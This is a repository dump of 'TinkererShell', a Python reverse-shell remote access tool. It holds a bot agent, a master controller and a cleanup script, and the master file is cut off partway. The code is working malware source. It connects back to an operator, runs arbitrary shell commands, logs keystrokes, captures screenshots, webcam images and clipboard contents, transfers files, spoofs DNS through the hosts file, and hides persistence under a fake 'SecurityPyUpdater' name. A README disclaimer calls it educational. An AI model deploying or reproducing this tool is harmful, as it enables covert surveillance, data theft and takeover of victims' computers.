├── LICENSE ├── README.md ├── Shell_Cleaner.py ├── TinkererShell.py ├── TinkererShellMaster.py ├── modules ├── autorun.py ├── my_crypt_func.py └── my_logger.py └── requirements.txt /LICENSE: -------------------------------------------------------------------------------- 1 | GNU GENERAL PUBLIC LICENSE 2 | Version 3, 29 June 2007 3 | 4 | Copyright (C) 2007 Free Software Foundation, Inc. 5 | Everyone is permitted to copy and distribute verbatim copies 6 | of this license document, but changing it is not allowed. 7 | 8 | Preamble 9 | 10 | The GNU General Public License is a free, copyleft license for 11 | software and other kinds of works. 12 | 13 | The licenses for most software and other practical works are designed 14 | to take away your freedom to share and change the works. By contrast, 15 | the GNU General Public License is intended to guarantee your freedom to 16 | share and change all versions of a program--to make sure it remains free 17 | software for all its users. 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But first, please read 674 | . 675 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # TinkererShell 2 | A simple reverse shell written in python 3.7 just for fun. 3 | Actually it supports Windows and Linux OS and integrates some basic features like keylogging and AES encrypted communications. 4 | 5 | 6 | ### Supported operating systems: 7 | - [x] Windows 8 | - [x] Linux 9 | - [ ] OSX 10 | 11 | ### Functions and characteristics: 12 | - [x] Reverse connection. 13 | - [x] AES encrypted communications. 14 | - [x] Multithreaded. 15 | - [x] Support multiple bots connected at the same time. 16 | - [x] Keylogger. 17 | - [x] Possibility to take screenshots of bot's monitors. 18 | - [x] Possibility to take pictures using bot's webcam. 19 | - [x] Possibility to steal bot's clipboard's content. 20 | - [x] Possibility to enable or disable persistence (before payload delivery or later via remote control). 21 | - [x] Possibility to enable or disable keylogger (before payload delivery or later via remote control). 22 | - [x] Simple DNS spoofer (via hosts file). 23 | - [x] Capability to upload and download files to and from the bot.


24 | 25 | > Work in progress... stay tuned! 26 | 27 | #### TODO: 28 | 29 | * Thoroughly test persistence function on Linux. 30 | * Thoroughly test persistence function on Windows. 31 | * Add webcam stream and microphone recording (ideally streaming from bot and saving locally to master). 32 | 33 | 34 | 35 | **_This project is for educational purposes only. Don't use it for illegal activities. I don't support nor condone illegal or unethical actions and I can't be held responsible for possible misuse of this software._** 36 | -------------------------------------------------------------------------------- /Shell_Cleaner.py: -------------------------------------------------------------------------------- 1 | import autorun 2 | import sys 3 | import os 4 | 5 | if os.name == "nt": 6 | platform = "windows" 7 | elif os.name == "posix": 8 | platform = "posix" 9 | else: 10 | sys.exit("System not supported!") 11 | 12 | if autorun.exists("SecurityPyUpdater"): 13 | print('Autorun exists!\nRemoving it...\n') 14 | try: 15 | autorun.remove("SecurityPyUpdater") 16 | except Exception as exception: 17 | print(exception) 18 | 19 | if platform == 'windows': 20 | target_to_autostart = str(Path.home()) + os.path.normcase('/demo/sec_upd.exe') 21 | else: 22 | target_to_autostart = str(Path.home()) + '/.Xsec_upd' 23 | 24 | if os.path.isfile(target_to_autostart): 25 | print('File exist in default path!\nDeleting it...\n') 26 | try: 27 | os.remove(target_to_autostart) 28 | except Exception as exception: 29 | print(exception) 30 | -------------------------------------------------------------------------------- /TinkererShell.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | # -*- coding: utf-8 -*- 3 | """TinkererShell bot, a simple agent for post exploitation.\n""" 4 | 5 | # Written By Ananke: https://github.com/4n4nk3 6 | import sys 7 | 8 | sys.path.append('./modules/') 9 | import shutil 10 | import socket 11 | import subprocess 12 | import os 13 | import tempfile 14 | import threading 15 | import pyperclip 16 | from time import sleep 17 | from base64 import b64encode, b64decode 18 | from filecmp import cmp 19 | from pathlib import Path 20 | import pyscreenshot as ImageGrab 21 | import cv2 22 | from io import BytesIO 23 | from tendo import singleton 24 | 25 | # Importing module for autostart written by Jonas Wagner 26 | # http://29a.ch/2009/3/17/autostart-autorun-with-python 27 | import autorun 28 | 29 | from my_crypt_func import encode_aes, decode_aes 30 | 31 | # Activating persistence (True) 32 | persistenceactivation = False 33 | 34 | # Global variables 35 | global thr_block 36 | global thr_exit 37 | 38 | # I understand on which system I am and then I import the corrects modules for the keylogger 39 | if os.name == 'nt': 40 | platform = 'windows' 41 | import pythoncom 42 | import pyHook 43 | elif os.name == 'posix': 44 | platform = 'posix' 45 | import pyxhook 46 | else: 47 | sys.exit('System not supported!') 48 | 49 | fd_temp, keylogfile = tempfile.mkstemp() 50 | with open(keylogfile, 'w') as f: 51 | f.write('') 52 | 53 | 54 | # ================================================================================================= 55 | 56 | def persistence_install() -> bool: 57 | """Install persistence.\n""" 58 | # TODO: test on Linux 59 | # TODO: test on Windows 60 | if not autorun.exists('SecurityPyUpdater'): 61 | path = os.path.abspath(sys.argv[0]) 62 | if platform == 'windows': 63 | target_to_autostart = str(Path.home()) + os.path.normcase('/demo/sec_upd.exe') 64 | else: 65 | target_to_autostart = str(Path.home()) + '/.Xsec_upd' 66 | if not os.path.isfile(target_to_autostart): 67 | shutil.copyfile(path, target_to_autostart) 68 | if platform == 'windows': 69 | # Try to hide file adding hidden attribute to it 70 | try: 71 | subprocess.check_call(["attrib", "+H", target_to_autostart]) 72 | except Exception as exception: 73 | print(exception) 74 | return False 75 | else: 76 | # Give executable permission to file 77 | try: 78 | subprocess.Popen('chmod 700 ' + target_to_autostart, shell=True, 79 | stdout=subprocess.PIPE, 80 | stderr=subprocess.PIPE, 81 | stdin=subprocess.PIPE) 82 | except Exception as exception: 83 | print(exception) 84 | return False 85 | autorun.add('SecurityPyUpdater', target_to_autostart) 86 | return True 87 | return False 88 | 89 | 90 | def persistence_remove() -> bool: 91 | """Uninstall persistence (disable autorun but can't delete himself).\n""" 92 | if autorun.exists('SecurityPyUpdater'): 93 | autorun.remove('SecurityPyUpdater') 94 | return True 95 | return False 96 | 97 | 98 | def persistence_status() -> bool: 99 | """Check if persistence is installed.\n""" 100 | if autorun.exists('SecurityPyUpdater'): 101 | return True 102 | return False 103 | 104 | 105 | # Persistence !!! 106 | if persistenceactivation is True: 107 | persistence_install() 108 | 109 | # Verify only one instance of TinkererShell is running 110 | me = singleton.SingleInstance() 111 | 112 | 113 | def receiver() -> str: 114 | """Receive data from master, decrypt it and return it.\n""" 115 | lengthcrypt = s.recv(1024).decode('utf-8') 116 | expected_length = int(decode_aes(lengthcrypt)) 117 | encrypted_received_data = '' 118 | while len(encrypted_received_data) < expected_length: 119 | encrypted_received_data += s.recv(1024).decode('utf-8') 120 | return decode_aes(encrypted_received_data) 121 | 122 | 123 | def sender(data_to_send: str) -> None: 124 | """Encrypt data and send it to master.\n""" 125 | # If data = 0 I will set an arbitrary string so sending operation will not be NULL 126 | if not data_to_send: 127 | data_to_send = 'Ok (no output)\n' 128 | # Crypting data, obtaining their length and then typecasting it to data_to_send string and crypting it 129 | encoded = encode_aes(data_to_send) 130 | length = str(len(encoded)) 131 | length_crypt = encode_aes(length) 132 | # Sending the length and wait. Then send data 133 | s.send(bytes(length_crypt, 'utf-8')) 134 | sleep(1) 135 | s.send(bytes(encoded, 'utf-8')) 136 | 137 | 138 | def command_executor(command: str): 139 | """Execute a command in the system shell and send its output to the master.\n""" 140 | try: 141 | proc = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, 142 | stdin=subprocess.PIPE) 143 | # Reading and sending output 144 | sender((proc.stdout.read() + proc.stderr.read()).decode('utf-8')) 145 | except Exception as exception: 146 | sender('reachedexcept') 147 | sender(str(exception)) 148 | 149 | 150 | def listprocesses(): 151 | """List running processes.\n""" 152 | if platform == 'windows': 153 | command_executor('tasklist') 154 | else: 155 | command_executor('pstree -u -p') 156 | 157 | 158 | def killprocesses(): 159 | """Kill a running process.\n""" 160 | if platform == 'windows': 161 | sender('Insert the name of the process\t\texample.exe\n') 162 | else: 163 | sender('Insert process PID\n') 164 | process_id = receiver() 165 | if platform == 'windows': 166 | command_executor('TASKKILL /IM ' + process_id + ' /F /T') 167 | else: 168 | command_executor('kill -9 ' + process_id) 169 | 170 | 171 | def dnsspoofer(dnsfile: str): 172 | """Edit hosts file to redirect user when visiting a specified domain.\n""" 173 | sender('Insert address from which you want to redirect\n') 174 | orig_address = receiver() 175 | sender('Insert address to which you want to redirect\n') 176 | evil_address = receiver() 177 | if os.access(dnsfile, os.W_OK): 178 | try: 179 | f_spoof = open(dnsfile, 'r') 180 | original_hosts_file = f_spoof.read() 181 | f_spoof.close() 182 | f_spoof = open(dnsfile, 'w') 183 | f_spoof.write(original_hosts_file + '\n' + evil_address + ' ' + orig_address) 184 | f_spoof.close() 185 | sender('Operation completed\n') 186 | except Exception as exception: 187 | sender(str(exception)) 188 | else: 189 | sender('Operation aborted! Cannot write to target file!\n') 190 | 191 | 192 | def dnscleaner(dnsfile: str, dnsbackup: str, send=False): 193 | """Restore original hosts file from backup made at shell startup.\n""" 194 | if os.access(dnsfile, os.W_OK): 195 | try: 196 | f_clean = open(dnsbackup, 'r') 197 | buffer = f_clean.read() 198 | f_clean.close() 199 | f_clean = open(dnsfile, 'w') 200 | f_clean.write(buffer) 201 | f_clean.close() 202 | if send is True: 203 | sender('DNS cleaned\n') 204 | except Exception as exception: 205 | if send is True: 206 | sender(str(exception)) 207 | else: 208 | if send is True: 209 | sender('Operation aborted! Cannot write to target file!\n') 210 | 211 | 212 | def keylogs_status(): 213 | """Check if keylogger thread is capturing data.\n""" 214 | if thr_block.isSet(): 215 | sender('Keylogger is not running!\n') 216 | else: 217 | sender('Keylogger is running!\n') 218 | 219 | 220 | def keylogs_start(): 221 | """Enable keylogger thread to capture data.\n""" 222 | if thr_block.isSet(): 223 | thr_block.clear() 224 | sender('Keylogger started!\n') 225 | else: 226 | sender('Keylogger is already running!\n') 227 | 228 | 229 | def keylogs_stop(): 230 | """Disable keylogger thread from capturing data.\n""" 231 | if not thr_block.isSet(): 232 | thr_block.set() 233 | sender('Keylogger stopped!\n') 234 | else: 235 | sender('Keylogger is not running!\n') 236 | 237 | 238 | def keylogs_download(): 239 | """Sends keylogged data to the master and delete it from victim host.\n""" 240 | try: 241 | with open(keylogfile, 'rb') as f_kd: 242 | keylogged_data = b64decode(f_kd.read()).decode('utf-8') 243 | sender(keylogged_data + '\n') 244 | except Exception as exception: 245 | sender('reachedexcept') 246 | sender(str(exception)) 247 | try: 248 | cleaner = open(keylogfile, 'w') 249 | cleaner.write('') 250 | cleaner.close() 251 | except Exception as exception: 252 | print(exception) 253 | 254 | 255 | # TODO: Test on Windows 256 | def screenshot(): 257 | """Takes a screenshot of bot's monitors and sends it to the master.\n""" 258 | buffer = BytesIO() 259 | try: 260 | im = ImageGrab.grab() 261 | im.save(buffer, format='PNG') 262 | im.close() 263 | b64_str = str(b64encode(buffer.getvalue())) 264 | sender(b64_str[2:-1]) 265 | except Exception as exception: 266 | sender('reachedexcept') 267 | sender(str(exception)) 268 | 269 | 270 | # TODO: Test on Windows 271 | def webcam_pic(): 272 | """Takes a picture with bot's webcam and sends it to the master.\n""" 273 | try: 274 | video_capture = cv2.VideoCapture(0) 275 | # Check success 276 | if video_capture.isOpened(): 277 | # Read picture. ret === True on success 278 | ret, frame = video_capture.read() 279 | # Close device 280 | video_capture.release() 281 | is_success, buffer = cv2.imencode(".png", frame) 282 | io_buf = BytesIO(buffer) 283 | b64_str = str(b64encode(io_buf.getvalue())) 284 | sender(b64_str[2:-1]) 285 | else: 286 | sender('reachedexcept') 287 | sender('Can\'t access any webcam!') 288 | except Exception as exception: 289 | sender('reachedexcept') 290 | sender(str(exception)) 291 | 292 | 293 | # TODO: Test on Windows 294 | def clip_copy(): 295 | """Sends bot's clipboard content to the master.\n""" 296 | try: 297 | sender('Clipboard content:\n' + pyperclip.paste()) 298 | except Exception as exception: 299 | sender(str(exception)) 300 | 301 | 302 | def downloader(): 303 | """Download a file from victim host to master.\n""" 304 | sender('Insert name of the file\t\t' + os.path.normcase('C:/boot.ini') + '\n') 305 | try: 306 | file_name = os.path.normcase(receiver()) 307 | # Reading file in binary form 308 | f_dow = open(file_name, 'rb') 309 | a = f_dow.read() 310 | f_dow.close() 311 | except Exception as exception: 312 | sender('reachedexcept') 313 | a = str(exception) 314 | sender(a.decode('utf-8')) 315 | 316 | 317 | def uploader(): 318 | """Upload a file from master to victim host.\n""" 319 | filename = os.path.normcase(receiver()) 320 | uploaded_data: str = receiver() 321 | if uploaded_data != 'reachedexcept': 322 | try: 323 | # Writing file in binary form 324 | filewrite = open(filename, 'wb') 325 | filewrite.write(bytes(uploaded_data, 'utf-8')) 326 | filewrite.close() 327 | sender('File saved in ' + filename + '\n') 328 | except Exception as exception: 329 | sender(str(exception)) 330 | else: 331 | sender('Operation aborted\n') 332 | 333 | 334 | # ================================================================================================= 335 | 336 | # Defining correct keylogging procedure 337 | def keylogger(fd_temp_key: int): 338 | """Key logger thread.\n""" 339 | 340 | def OnKeyboardEvent(event): 341 | """"Define action triggered when a key is pressed.\n""" 342 | if not thr_block.isSet(): 343 | if event.Ascii != 0 and event.Ascii != 8: 344 | # Use base64 and not an encryption just for performance 345 | with open(keylogfile, 'r+b') as f_key: 346 | data_decoded = b64decode(f_key.read()).decode('utf-8') 347 | f_key.seek(0) 348 | if event.Key == 'space': 349 | data_decoded += ' ' 350 | f_key.write(b64encode(data_decoded.encode('utf-8'))) 351 | elif event.Key == 'BackSpace': 352 | data_decoded += '[BackSpace]' 353 | f_key.write(b64encode(data_decoded.encode('utf-8'))) 354 | elif event.Key == 'Return': 355 | data_decoded += '[Enter]' 356 | f_key.write(b64encode(data_decoded.encode('utf-8'))) 357 | elif event.Key == 'Shift_L': 358 | data_decoded += '[Shift_L]' 359 | f_key.write(b64encode(data_decoded.encode('utf-8'))) 360 | elif event.Key == 'Shift_R': 361 | data_decoded += '[Shift_R]' 362 | f_key.write(b64encode(data_decoded.encode('utf-8'))) 363 | elif event.Key == 'Tab': 364 | data_decoded += '[Tab]' 365 | f_key.write(b64encode(data_decoded.encode('utf-8'))) 366 | else: 367 | data_decoded += event.Key 368 | f_key.write(b64encode(data_decoded.encode('utf-8'))) 369 | if thr_exit.isSet(): 370 | os.close(fd_temp_key) 371 | hm.cancel() 372 | return True 373 | 374 | # create a hook manager 375 | if platform == 'windows': 376 | hm = pyHook.HookManager() 377 | else: 378 | hm = pyxhook.HookManager() 379 | # watch for all mouse events 380 | hm.KeyDown = OnKeyboardEvent 381 | # set the hook 382 | hm.HookKeyboard() 383 | # wait forever 384 | if platform == 'windows': 385 | pythoncom.PumpMessages() 386 | else: 387 | hm.start() 388 | 389 | 390 | # ================================================================================================= 391 | 392 | def backdoor(): 393 | """Shell thread that connect to master and permit control over the agent.\n""" 394 | while True: 395 | host = '127.0.0.1' # Remote host to which you want the backdoor to connect to 396 | port = 4444 # The connection port to use 397 | 398 | # Defining global the variables that I need to use in many different functions 399 | global s 400 | 401 | # Creating the socket 402 | first_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 403 | 404 | if platform == 'windows': 405 | dnsfile = os.getenv('WINDIR') + os.path.normcase('/system32/drivers/etc/hosts') 406 | dnsbackup = tempfile.gettempdir() + os.path.normcase('/spoofbackup') 407 | else: 408 | dnsfile = '/etc/hosts' 409 | dnsbackup = tempfile.gettempdir() + '/spoofbackup' 410 | 411 | # Backing up Hosts file 412 | f_bd = open(dnsfile, 'r') 413 | buffer = f_bd.read() 414 | f_bd.close() 415 | f_bd = open(dnsbackup, 'w') 416 | f_bd.write(buffer) 417 | f_bd.close() 418 | 419 | # Connection loop 420 | while True: 421 | while True: 422 | if thr_exit.isSet(): 423 | break 424 | try: 425 | # Connecting to the client 426 | first_s.connect((host, port)) 427 | break 428 | # If i cannot connect I wait 2 minutes and then I retry 429 | except Exception as exception: 430 | print(exception) 431 | print('>>> New attempt in 2 min') 432 | sleep(30) 433 | print('>>> New attempt in 1,5 min') 434 | sleep(30) 435 | print('>>> New attempt in 1 min') 436 | sleep(30) 437 | print('>>> New attempt in 30 sec') 438 | sleep(30) 439 | if thr_exit.isSet(): 440 | break 441 | # Sending information relatives to the infected system 442 | proc = subprocess.run(['whoami'], check=True, stdout=subprocess.PIPE, universal_newlines=True) 443 | username = proc.stdout.split()[0] 444 | # First time i send username 445 | encoded = encode_aes(username) 446 | length = str(len(encoded)) 447 | length_crypt = encode_aes(length) 448 | # Sending the length and wait. Then send data 449 | first_s.send(bytes(length_crypt, 'utf-8')) 450 | sleep(1) 451 | first_s.send(bytes(encoded, 'utf-8')) 452 | print('Connection successful') 453 | lengthcrypt = first_s.recv(1024).decode('utf-8') 454 | expected_length = int(str(decode_aes(lengthcrypt))) 455 | encrypted_received_data = '' 456 | while len(encrypted_received_data) < expected_length: 457 | encrypted_received_data += first_s.recv(1024).decode('utf-8') 458 | new_port = int(decode_aes(encrypted_received_data)) 459 | print('New port is gonna be {}'.format(new_port)) 460 | sleep(5) 461 | first_s.close() 462 | # Connecting to the client on the new port 463 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 464 | s.connect((host, new_port)) 465 | # Sending information relatives to the infected system 466 | encoded = encode_aes(username) 467 | length = str(len(encoded)) 468 | length_crypt = encode_aes(length) 469 | # Sending the length and wait. Then send data 470 | s.send(bytes(length_crypt, 'utf-8')) 471 | sleep(1) 472 | s.send(bytes(encoded, 'utf-8')) 473 | break 474 | 475 | # Commands loop 476 | if not thr_exit.isSet(): 477 | while 1: 478 | received_command = receiver() 479 | if received_command != 'KeepAlive': 480 | if received_command == 'SHquit': 481 | sender('mistochiudendo') 482 | break 483 | elif received_command == 'SHkill': 484 | sender('mistochiudendo') 485 | # If thr_exit.set() next keystroke will terminate keylogger thread 486 | thr_exit.set() 487 | break 488 | elif received_command == 'SHprocesslist': 489 | listprocesses() 490 | elif received_command == 'SHprocesskill': 491 | killprocesses() 492 | elif received_command == 'SHdnsstart': 493 | dnsspoofer(dnsfile) 494 | elif received_command == 'SHdnsstop': 495 | if cmp(dnsfile, dnsbackup) is False: 496 | dnscleaner(dnsfile, dnsbackup, send=True) 497 | else: 498 | sender('Original hosts file and current one are the same! Nothing to change.') 499 | elif received_command == 'SHdownload': 500 | downloader() 501 | elif received_command == 'SHupload': 502 | uploader() 503 | elif received_command == 'SHscreenshot': 504 | screenshot() 505 | elif received_command == 'SHwebcampic': 506 | webcam_pic() 507 | elif received_command == 'SHclipboard': 508 | clip_copy() 509 | elif received_command == 'SHkeylogstatus': 510 | keylogs_status() 511 | elif received_command == 'SHkeylogstart': 512 | keylogs_start() 513 | elif received_command == 'SHkeylogstop': 514 | keylogs_stop() 515 | elif received_command == 'SHkeylogdownload': 516 | keylogs_download() 517 | elif received_command == 'SHpersistenceenable': 518 | if persistence_install(): 519 | sender('Persistence installation successful!') 520 | else: 521 | sender('Persistence already installed!') 522 | elif received_command == 'SHpersistencedisable': 523 | if persistence_remove(): 524 | sender('Persistence remove successful!') 525 | else: 526 | sender('Persistence not yet installed!') 527 | elif received_command == 'SHpersistencestatus': 528 | if persistence_status(): 529 | sender('Persistence is installed.') 530 | else: 531 | sender('Persistence is not installed.') 532 | else: 533 | command_executor(received_command) 534 | 535 | # Recreating original hosts file of the system 536 | if cmp(dnsfile, dnsbackup) is False: 537 | dnscleaner(dnsfile, dnsbackup) 538 | try: 539 | os.remove(dnsbackup) 540 | except Exception as exception: 541 | print(exception) 542 | # Closing socket 543 | s.close() 544 | print('Connection closed') 545 | if thr_exit.isSet(): 546 | break 547 | sleep(120) 548 | return True 549 | 550 | 551 | thr_block = threading.Event() 552 | thr_exit = threading.Event() 553 | 554 | # Keylogger's thread 555 | thread1 = threading.Thread(name='sic1', target=keylogger, args=[fd_temp]).start() 556 | # Backdoor's thread 557 | thread2 = threading.Thread(name='sic2', target=backdoor).start() 558 | 559 | # TODO: Add Webcam stream and microphone 560 | -------------------------------------------------------------------------------- /TinkererShellMaster.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3.7 2 | # -*- coding: utf-8 -*- 3 | """TinkererShell master, a simple bots manager.\n""" 4 | 5 | # Written By Ananke: https://github.com/4n4nk3 6 | import sys 7 | 8 | sys.path.append('./modules/') 9 | import datetime 10 | import os 11 | import cmd 12 | import threading 13 | from time import sleep 14 | from base64 import b64decode 15 | from random import randrange 16 | from socket import socket, AF_INET, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR, timeout 17 | 18 | from my_crypt_func import encode_aes, decode_aes 19 | from my_logger import logging 20 | 21 | connected_sockets = [] 22 | active_bot = 1000 23 | thr_exit = threading.Event() 24 | 25 | 26 | # noinspection PyUnboundLocalVariable 27 | def connection_gate(): 28 | """Thread that keep accepting new bots, assigning ports, and passing them to other threads doing keep-alive.\n""" 29 | host = '' 30 | port = 4444 31 | # Socket definition 32 | s = socket(AF_INET, SOCK_STREAM) 33 | s.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 34 | s.bind((host, port)) 35 | logging(data_to_log='\nWelcome in TinkererShell!\nWritten By 4n4nk3: https://github.com/4n4nk3\n', printer=True) 36 | logging(data_to_log=('Listening on 0.0.0.0:%s...' % str(port)), printer=True) 37 | 38 | # Listening... 39 | s.listen(10) 40 | while True: 41 | while True: 42 | so = s 43 | so.settimeout(60) 44 | try: 45 | conn_gate, addr = so.accept() 46 | break 47 | except timeout: 48 | if thr_exit.isSet(): 49 | break 50 | if thr_exit.isSet(): 51 | break 52 | # noinspection PyUnboundLocalVariable 53 | lengthcrypt = conn_gate.recv(1024).decode('utf-8') 54 | expected_length = int(decode_aes(lengthcrypt)) 55 | encrypted_received_data: str = '' 56 | while len(encrypted_received_data) < expected_length: 57 | encrypted_received_data += conn_gate.recv(1024).decode('utf-8') 58 | clear_text = decode_aes(encrypted_received_data) 59 | logging(data_to_log=('Connection established with: ' + str(addr).split('\'')[1]), printer=True) 60 | while True: 61 | new_port = randrange(5000, 6000) 62 | try: 63 | new_so = socket(AF_INET, SOCK_STREAM) 64 | new_so.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1) 65 | new_so.bind((host, new_port)) 66 | encrypted = encode_aes(str(new_port)) 67 | # Send encrypted data's length encrypted 68 | conn_gate.send(bytes(encode_aes(str(len(encrypted))), 'utf-8')) 69 | # Sleep 1 second to let the receiver decrypt the length packet. 70 | sleep(1) 71 | # Send encrypted data 72 | conn_gate.send(bytes(encrypted, 'utf-8')) 73 | threading.Thread(target=handler, args=(new_so, new_port, clear_text)).start() 74 | break 75 | except os.error as exception_gate: 76 | if exception_gate.errno == 98: 77 | print("Port is already in use") 78 | else: 79 | print(exception_gate) 80 | if thr_exit.isSet(): 81 | break 82 | if thr_exit.isSet(): 83 | break 84 | 85 | 86 | def handler(new_so, new_port, username): 87 | """Keep-alive the connected bots.\n""" 88 | global connected_sockets 89 | new_so.listen(10) 90 | conn_handler, addr = new_so.accept() 91 | lengthcrypt = conn_handler.recv(1024) 92 | expected_length = int(decode_aes(lengthcrypt)) 93 | encrypted_received_data: str = '' 94 | while len(encrypted_received_data) < expected_length: 95 | encrypted_received_data += conn_handler.recv(1024).decode('utf-8') 96 | a = decode_aes(encrypted_received_data) 97 | if a == username: 98 | logging(data_to_log=('Connection consolidated with: {}\t{}'.format(str(addr).split('\'')[1], username)), 99 | printer=True) 100 | connected_sockets.append( 101 | {'conn': conn_handler, 'port': new_port, 'ip': str(addr).split('\'')[1], 'username': username, 102 | 'status': True}) 103 | position = len(connected_sockets) - 1 104 | while True: 105 | if position != active_bot: 106 | encrypted = encode_aes('KeepAlive') 107 | # Send encrypted data's length encrypted 108 | conn_handler.send(bytes(encode_aes(str(len(encrypted))), 'utf-8')) 109 | # Sleep 1 second to let the receiver decrypt the length packet. 110 | sleep(1) 111 | # Send encrypted data 112 | conn_handler.send(bytes(encrypted, 'utf-8')) 113 | sleep(60) 114 | if thr_exit.isSet(): 115 | break 116 | conn_handler.close() 117 | 118 | 119 | def sender(data_to_send: str) -> bool: 120 | """Send a string to the connected bot. Make sure string is not empty in order to prevent reception exceptions.\n""" 121 | if not data_to_send: 122 | data_to_send = 'Ok (no output)' 123 | # Encrypt data 124 | encrypted = encode_aes(data_to_send) 125 | # Send encrypted data's length encrypted 126 | conn.send(bytes(encode_aes(str(len(encrypted))), 'utf-8')) 127 | # Sleep 1 second to let the receiver decrypt the length packet. 128 | sleep(1) 129 | # Send encrypted data 130 | conn.send(bytes(encrypted, 'utf-8')) 131 | return True 132 | 133 | 134 | def receiver(printer=False) -> str: 135 | """Receive encrypted data and return clear-text string.\n""" 136 | lengthcrypt = conn.recv(1024).decode('utf-8') 137 | expected_length = int(decode_aes(lengthcrypt)) 138 | encrypted_received_data: str = '' 139 | while len(encrypted_received_data) < expected_length: 140 | encrypted_received_data += conn.recv(1024).decode('utf-8') 141 | clear_text = decode_aes(encrypted_received_data) 142 | if printer is True: 143 | logging(data_to_log=clear_text, printer=True) 144 | return clear_text 145 | 146 | 147 | def ask_input(phrase: object = False, send: bool = False) -> str: 148 | """Ask for user input with custom phrase or default to >>>. If needed send input to connected bot.\n""" 149 | if phrase: 150 | user_input = input(phrase) 151 | logging(data_to_log=(''.join((phrase, user_input)))) 152 | if send is True: 153 | sender(user_input) 154 | else: 155 | user_input = input('>>> ') 156 | logging(data_to_log=('>>> ' + user_input)) 157 | if send is True: 158 | sender(user_input) 159 | return user_input 160 | 161 | 162 | def downloader() -> bool: 163 | """Download a file from the bot.\n""" 164 | sender('SHdownload') 165 | # File to be downloaded 166 | receiver(printer=True) 167 | ask_input(send=True) 168 | received_file_data = receiver() 169 | # Local filename to save downloaded file 170 | local_filename = ask_input(phrase='Insert name which you want to use to save the file\t\texample.txt\n\n >>> ') 171 | # sender(a) 172 | if received_file_data != 'reachedexcept': 173 | try: 174 | downloaded_file_descriptor = open(local_filename, 'wb') 175 | downloaded_file_descriptor.write(bytes(received_file_data, 'utf-8')) 176 | downloaded_file_descriptor.close() 177 | logging(data_to_log=('File saved in ' + os.getcwd() + '\n'), printer=True) 178 | except Exception as exception_downloader: 179 | logging(data_to_log=str(exception_downloader), printer=True) 180 | else: 181 | remote_exception = receiver() 182 | logging( 183 | data_to_log='Operation aborted (received string from bot)\nDetails: ' + remote_exception, 184 | printer=True) 185 | return True 186 | 187 | 188 | def uploader() -> bool: 189 | """Upload a file to the bot.\n""" 190 | sender('SHupload') 191 | file_to_upload = ask_input(phrase=('Insert the name of the file that you want to upload\t\t' + os.path.normcase( 192 | 'C:/boot.ini') + '\n\n >>> ')) 193 | ask_input(phrase='Insert name which you want to use to save the file\t\tC:\\boot.ini\n\n >>> ', send=True) 194 | try: 195 | upload_descriptor = open(file_to_upload, 'rb') 196 | file_data = upload_descriptor.read() 197 | upload_descriptor.close() 198 | except Exception as exception_uploader: 199 | logging(data_to_log=str(exception_uploader), printer=True) 200 | file_data = 'reachedexcept' 201 | sender(file_data.decode('utf-8')) 202 | receiver(printer=True) 203 | return True 204 | 205 | 206 | def screenshot() -> bool: 207 | """Take a full screen screenshot from the bot.\n""" 208 | sender('SHscreenshot') 209 | received_file_data = b64decode(receiver()) 210 | if received_file_data != 'reachedexcept': 211 | counter = 0 212 | while True: 213 | local_filename = 'screenshot-{}-{}-{}.png'.format(connected_sockets[active_bot]['ip'], 214 | connected_sockets[active_bot]['username'], str(counter)).replace("\\", "").replace("/", "") 215 | if not os.path.isfile(local_filename): 216 | break 217 | counter += 1 218 | try: 219 | downloaded_file_descriptor = open(local_filename, 'wb') 220 | downloaded_file_descriptor.write(received_file_data) 221 | downloaded_file_descriptor.close() 222 | logging(data_to_log=('Screenshot saved as ' + local_filename + '\n'), printer=True) 223 | except Exception as exception_downloader: 224 | logging(data_to_log=str(exception_downloader), printer=True) 225 | else: 226 | remote_exception = receiver() 227 | logging( 228 | data_to_log='Operation aborted (received string from bot)\nDetails: ' + remote_exception, 229 | printer=True) 230 | return True 231 | 232 | 233 | def webcam_pic() -> bool: 234 | """Take a picture using bot's webcam.\n""" 235 | sender('SHwebcampic') 236 | received_file_data = b64decode(receiver()) 237 | if received_file_data != 'reachedexcept': 238 | counter = 0 239 | while True: 240 | local_filename = 'webcam-pic-{}-{}-{}.png'.format(connected_sockets[active_bot]['ip'], 241 | connected_sockets[active_bot]['username'], str(counter)).replace("\\", "").replace("/", "") 242 | if not os.path.isfile(local_filename): 243 | break 244 | counter += 1 245 | try: 246 | downloaded_file_descriptor = open(local_filename, 'wb') 247 | downloaded_file_descriptor.write(received_file_data) 248 | downloaded_file_descriptor.close() 249 | logging(data_to_log=('Screenshot saved as ' + local_filename + '\n'), printer=True) 250 | except Exception as exception_downloader: 251 | logging(data_to_log=str(exception_downloader), printer=True) 252 | else: 253 | remote_exception = receiver() 254 | logging( 255 | data_to_log='Operation aborted (received string from bot)\nDetails: ' + remote_exception, 256 | printer=True) 257 | return True 258 | 259 | 260 | def clip_copy(): 261 | """Download clipboard content from bot.\n""" 262 | sender('SHclipboard') 263 | receiver(printer=True) 264 | 265 | 266 | def processkiller(): 267 | """Kill a process.\n""" 268 | sender('SHprocesskill') 269 | receiver(printer=True) 270 | ask_input(send=True) 271 | receiver(printer=True) 272 | 273 | 274 | def dnsspoofer(): 275 | """Start DNS spoofing via 'hosts' file.\n""" 276 | sender('SHdnstart') 277 | receiver(printer=True) 278 | ask_input(send=True) 279 | receiver(printer=True) 280 | ask_input(send=True) 281 | receiver(printer=True) 282 | 283 | 284 | def keylogdownloader(): 285 | """Download keystrokes logged by keylogger.\n""" 286 | sender('SHkeylogdownload') 287 | keylogged_data = receiver() 288 | local_filename = 'keylogged-{}-{}.txt'.format(connected_sockets[active_bot]['ip'], 289 | connected_sockets[active_bot]['username']).replace("\\", "").replace("/", "") 290 | if keylogged_data == 'reachedexcept': 291 | receiver(printer=True) 292 | else: 293 | try: 294 | keylogged_descriptor = open(local_filename, 'a') 295 | keylogged_descriptor.write(keylogged_data) 296 | keylogged_descriptor.close() 297 | logging(data_to_log='Download completed!\n Use to see keylogged data\n', printer=True) 298 | except Exception as 